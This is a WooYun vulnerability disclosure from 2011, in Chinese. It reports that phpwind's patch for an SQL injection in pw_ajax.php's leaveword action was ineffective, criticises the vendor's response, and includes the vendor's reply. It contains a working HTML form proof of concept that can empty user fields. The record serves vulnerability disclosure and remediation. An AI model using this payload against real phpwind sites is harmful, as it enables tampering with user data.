漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2011-02799
漏洞标题:phpwind漏洞响应无法解决相应问题导致PW用户相关字段可被清空
相关厂商:phpwind
漏洞作者: Ray
提交时间:2011-09-08 11:35
修复时间:2011-10-08 11:36
公开时间:2011-10-08 11:36
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2011-09-08: 细节已通知厂商并且等待厂商处理中
2011-09-08: 厂商已经确认,细节仅向厂商公开
2011-09-11: 细节向第三方安全合作伙伴开放
2011-11-02: 细节向核心白帽子及相关领域专家公开
2011-11-12: 细节向普通白帽子公开
2011-11-22: 细节向实习白帽子公开
2011-10-08: 细节向公众公开
简要描述:
相关安全部门没有尽到安全响应的响应职责,未深刻理解漏洞原因,未与开发部门协调真实的解决问题,导致漏洞根本没补,却出了一个所谓的补丁,完成了一个“我们在第一时间就做出了响应,当天就已经修复并发布”的漏洞响应。
详细说明:
WooYun: PHPWIND最新版本SQL注入漏洞
我是通过gpc提交的atc_content为:pid,而不是[:pid],我确实不知道你们补丁到底是在干什么。
漏洞证明:
<form method="post" action="http://127.0.0.1/phpwind/pw_ajax.php?action=leaveword">
<input name="step" value="2">
<input name="verify" value="2367d749">
<input name="tid" value="1">
<input name="pid" value="#">
<input name="atc_content" value=":pid">
<input name="submit" type="submit">
</form>
修复方案:
再出一次补丁,出一次能用的补丁。
如果补丁出了一个月,却没有解决任何问题,是漏洞响应的机制出了问题,需要修复的是这个漏洞响应机制。
相关安全部门有无确切了解漏洞,有无和确切阐述漏洞,有无跟踪和测试补丁。
和xsser意愿相同,我希望甲方在修复漏洞的时候,表现出足够的尊重,例如不了解漏洞原因的情况下使用wooyun的站内信方式沟通,在相关补丁页面提供wooyun的补丁,你们前进一步我们的努力就不会倒退,站长知道并且能快速的链接到这边,能给你们增加多大的损失或劳动力么?
版权声明:转载请注明来源 Ray@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2011-09-08 17:39
厂商回复:
非常感谢Ray提出这个漏洞,我们已经跟进了该漏洞,发现只有8.3才受该漏洞的影响。新的补丁已经发布,链接如下http://www.phpwind.net/read-htm-tid-1400034.html,希望Ray届时帮忙确认漏洞是否修复成功,再次谢谢!
最新状态:
暂无